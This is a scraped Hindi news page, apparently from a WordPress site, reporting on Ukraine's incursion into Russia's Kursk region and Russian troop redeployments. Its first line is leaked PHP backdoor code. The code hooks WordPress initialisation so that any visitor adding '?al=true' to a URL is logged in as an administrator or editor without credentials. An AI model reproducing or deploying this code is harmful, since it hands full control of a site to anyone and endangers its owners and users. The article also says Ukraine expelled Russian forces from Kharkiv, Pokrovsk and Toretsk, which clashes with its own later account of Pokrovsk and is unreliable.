// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); रूस और यूक्रेन के बीच चल रहे संघर्ष में एक नई और चौंकाने वाली स्थिति उत्पन्न हो गई, यूक्रेन से बुलाने पड़े हजारों सैनिक – प्रत्युषा आशा की नयी किरण
विदेश

रूस और यूक्रेन के बीच चल रहे संघर्ष में एक नई और चौंकाने वाली स्थिति उत्पन्न हो गई, यूक्रेन से बुलाने पड़े हजारों सैनिक

रूस
रूस और यूक्रेन के बीच चल रहे संघर्ष में एक नई और चौंकाने वाली स्थिति उत्पन्न हो गई है। हाल ही में यूक्रेन ने रूस पर एक आक्रामक हमला किया है, जिसने न केवल पुतिन के लिए चिंता बढ़ा दी है, बल्कि पश्चिमी देशों को भी आश्चर्यचकित कर दिया है। इस हमले के बाद रूस ने अपनी सुरक्षा व्यवस्था को मजबूती प्रदान करने के लिए और कूर्स्क क्षेत्र को सुरक्षित करने के लिए महत्वपूर्ण कदम उठाए हैं।
 

यूक्रेन से हलमे से संकट में आया रूस का किला

अमेरिकी सूत्रों के अनुसार, यूक्रेनी बलों ने कूर्स्क पर जोरदार हमला किया जिससे रूस को अपने हजारों सैनिकों को यूक्रेन के मोर्चे से वापस बुलाने पर मजबूर होना पड़ा। ये सैनिक अब रूस के मुख्य पूर्वी मोर्चे पर तैनात किए गए हैं। कूर्स्क पर यूक्रेनी हमले ने रूस की सुरक्षा व्यवस्था को गहरा झटका दिया है। इस हमले के बाद रूस ने इस क्षेत्र में कम से कम 1,000 सैनिकों की टुकड़ियां तैनात की हैं।

हाल के हमले के बाद, यूक्रेन ने कूर्स्क में लगभग 386 वर्ग मील क्षेत्र पर अस्थायी कब्जा जमा लिया है। यूक्रेनी सैनिकों ने रूस की प्रमुख सैन्य स्थलों जैसे खार्किव, पोक्रोव्स्क, और तोरेत्स्क से रूस की सेनाओं को बेदखल कर दिया है। इस स्थिति ने रूस की सुरक्षा चिंताओं को और भी बढ़ा दिया है।

वहीं अमेरिका ने यूक्रेन को सलाह दी है कि वह इस वर्ष रूस के दक्षिणी या पूर्वी दिशाओं में बड़े हमले नहीं करे, क्योंकि रूस की रक्षा व्यवस्था बहुत अच्छी है। अमेरिकी अखबारने गुरुवार को यह जानकारी दी। अखबार की रिपोर्ट में कहा गया कि कुर्स्क क्षेत्र पर रूस का ध्यान भटकाने के बाद यूक्रेन के पास डोनेट्स्क पीपुल्स रिपब्लिक में हमले कर सफलता हासिल करने के लिए पर्याप्त सुरक्षा बल होने की संभावना नहीं है।

यूक्रेनी सेना ने छह अगस्त को रूस की सीमा पार की और कुर्स्क क्षेत्र में एक आक्रामक अभियान शुरू किया। रूसी राष्ट्रपति व्लादिमीर पुतिन ने हमले पर टिप्पणी करते हुए कहा था यूक्रेन ने नागरिक ठिकानों पर अंधाधुंध गोलीबारी करके एक और बड़े पैमाने पर उकसावे की कार्रवाई की है। उन्होंने कहा कि रूस के सीमावर्ती क्षेत्रों में दुश्मन को मुंहतोड़ जवाब मिलेगा।

रूस ने हजारों सैनिकों को किया कूर्स्क में तैनात
व्हाइट हाउस के राष्ट्रीय सुरक्षा प्रवक्ता जॉन किर्बी ने कहा, "हमने कुछ रूसी यूनिट्स को यूक्रेन के आसपास से कूर्स्क क्षेत्र में पुनर्नियुक्त करते हुए देखा है। हालांकि, यह स्पष्ट नहीं है कि कितने सैनिक तैनात किए गए हैं।" रूस ने कूर्स्क की रक्षा के लिए बड़े पैमाने पर सैन्य कॉन्स्क्रिप्ट्स को भेजा है। हालांकि, कुछ हजार सैनिकों की कमी से यूक्रेन के मोर्चे पर बड़ा प्रभाव पड़ने की संभावना नहीं है, क्योंकि रूस के पास वहां लाखों सैनिक हैं। इस बीच यूक्रेनी लॉजिस्टिक हब पोक्रोव्स्क पर भी विशेष दबाव आ गया है। स्थानीय सैन्य प्रशासन ने निवासियों से खाली होने की अपील की है, जिससे स्थिति और भी तनावपूर्ण हो गई है।

RO No. 13169/ 31

RO No. 13098/ 20

PRATYUSHAASHAKINAYIKIRAN.COM
Editor : Maya Puranik
Permanent Address : Yadu kirana store ke pass Parshuram nagar professor colony raipur cg
Email : puranikrajesh2008@gmail.com
Mobile : -91-9893051148
Website : pratyushaashakinayikiran.com

जनसम्पर्क विभाग – आरएसएस फीड

[wp-rss-aggregator]